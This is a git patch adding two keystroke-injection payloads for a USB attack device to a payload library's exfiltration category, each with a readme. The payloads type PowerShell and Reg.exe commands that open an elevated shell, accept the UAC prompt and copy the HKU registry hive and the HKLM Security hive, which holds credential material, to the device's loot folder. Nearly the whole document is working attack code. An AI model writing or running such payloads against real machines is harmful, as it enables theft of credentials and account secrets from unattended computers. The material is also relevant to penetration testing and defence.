From 3904f165d9f07f0597a0e8e32fed5f23c4d35349 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Mon, 14 Dec 2020 23:53:42 +0000 Subject: [PATCH] Added new payload WIN_PoSH_HKU_RegBackUp (#424) * Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny --- .../WIN_PoSH_HKU_RegBackUp/payload.txt | 23 ++++++++++++++ .../WIN_PoSH_HKU_RegBackUp/readme.md | 30 +++++++++++++++++++ .../WIN_PoSH_SaveSecurityHive/payload.txt | 22 ++++++++++++++ .../WIN_PoSH_SaveSecurityHive/readme.md | 26 ++++++++++++++++ 4 files changed, 101 insertions(+) create mode 100644 payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt create mode 100644 payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md create mode 100644 payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt create mode 100644 payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md diff --git a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt new file mode 100644 index 00000000..8e2d8473 --- /dev/null +++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt @@ -0,0 +1,23 @@ +# Title: Backup User registry (HKU) +# Description: Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny +# Author: Cribbit +# Version: 1.1 +# Category: Exfiltration +# Target: Windows 10 (Creators Update) (Powershell) +# Attackmodes: HID & STORAGE +# Config: Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ] + +LED SETUP +ATTACKMODE HID STORAGE + +LED ATTACK +Q DELAY 200 +REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))" +Q GUI x +Q STRING a +Q DELAY 100 +Q ALT y +Q DELAY 100 +Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y" +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md new file mode 100644 index 00000000..5255d7ea --- /dev/null +++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md @@ -0,0 +1,30 @@ +# Backup User registry (HKU) +* Author: Cribbit +* Version: 1.1 +* Target: Windows 10 (Creators Update) (Powershell) +* Category: Exfiltration +* Attackmode: HID & STORAGE + +## Change Log +| Version | Changes | +| ------- | -------------------------------| +| 1.0 | Initial release | +| 1.1 | Use Admin Shell (for all keys) | + +## Description +Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny. + +## Configuration +RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ] + +Usesful Reg.exe export parameters: +* /y Force overwriting the existing file without prompt. +* /reg:32 Specifies the key should be accessed using the 32-bit registry view. +* /reg:64 Specifies the key should be accessed using the 64-bit registry view. + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISH | Green blink followed by SOLID | Script is finished | diff --git a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt new file mode 100644 index 00000000..8dc767c9 --- /dev/null +++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt @@ -0,0 +1,22 @@ +# Title: Save security hive +# Description: Uses PowerShell, to run Reg.exe to save security hive to the bunny. +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target: Windows 10 Creators Update (Powershell) +# Attackmodes: HID & STORAGE +# Props: Ben Clark (RTFM) + +LED SETUP +ATTACKMODE HID STORAGE + +LED ATTACK +Q DELAY 200 +Q GUI x +Q STRING a +sleep 2 +Q ALT y +sleep 2 +Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y" +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md new file mode 100644 index 00000000..bf8078b8 --- /dev/null +++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md @@ -0,0 +1,26 @@ +# Save security hive +* Author: Cribbit +* Version: 1.0 +* Target: Windows 10 (Creators Update) (Powershell) +* Category: Exfiltration +* Attackmode: HID & STORAGE +* Props: Ben Clark (RTFM) + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.0 | Initial release | + +## Description +Uses PowerShell, to run Reg.exe to save security hive to the bunny. +## Configuration +Usesful Reg.exe save parameters: +* /y Force overwriting the existing file without prompt. +* /reg:32 Specifies the key should be accessed using the 32-bit registry view. +* /reg:64 Specifies the key should be accessed using the 64-bit registry view. +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file